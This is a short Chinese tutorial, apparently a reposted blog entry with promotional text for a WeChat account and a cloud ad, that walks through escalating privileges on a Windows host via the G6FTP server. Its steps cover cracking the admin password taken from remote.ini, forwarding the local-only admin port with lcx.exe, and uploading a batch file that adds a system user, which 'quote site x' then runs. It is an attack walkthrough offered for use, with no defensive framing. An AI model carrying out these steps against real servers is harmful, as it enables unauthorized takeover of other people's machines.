步骤

1.下载配置文件 administrator

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

2.利用lcx 端口转发 默认只允许本机连接

3.lcx.exe -tran 8027 127.0.0.1 8021

4.使用客户端以管理员用户登录

5.创建用户并权限设置和执行批处理文件

6.上传批处理

7.创建普通用户登录ftp

8.执行命令 quote site x.bat

9.x.bat -添加系统用户 提权

打开配置文件 remote.ini  复制密码 用cmd5 破解

第三方软件 G6ftp提权 Safe 第1张

安装 G6Ftp

找到一个可以读写的目录 上传一个cmd.exe  和lcx 端口转发工具

lcx.exe -tran 8027 127.0.0.1 8021  端口映射

第三方软件 G6ftp提权 Safe 第2张

找一个可读可写目录上传批处理

添加普通用户 把批处理文件放入 重新命名批处理文件 x

 

ftp 连接   ftp ip

执行命令

quote site x

 

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄